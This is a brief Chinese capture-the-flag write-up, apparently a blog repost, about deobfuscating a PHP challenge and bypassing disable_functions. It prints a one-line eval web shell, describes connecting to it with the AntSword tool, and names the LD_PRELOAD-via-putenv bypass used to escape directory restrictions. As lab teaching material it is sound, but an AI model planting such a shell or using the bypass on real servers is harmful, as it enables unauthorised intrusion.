考點
PHP混淆加密&解密
disable_functions繞過
題目
打開題目,發現一堆混淆過的php原始碼

解題
解密方式
1:利用Xdebug除錯解碼
2:在線解密
得到原始代碼
<?php
highlight_file(__FILE__);
@eval($_POST[ymlisisisiook]);
?>
既然解開了加密,那么直接用蟻劍連接
連接成功,但是發現只能訪問/var/www/html/目錄,被限制了

利用蟻劍的"繞過disable_functions"插件檢測一下函式,發現putenv沒有被禁用

linux主機,putenv=on,用LD_PRELOAD方法繞過

執行成功

訪問生成的檔案,測驗連接成功

flag在根目錄下

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/279678.html
標籤:其他
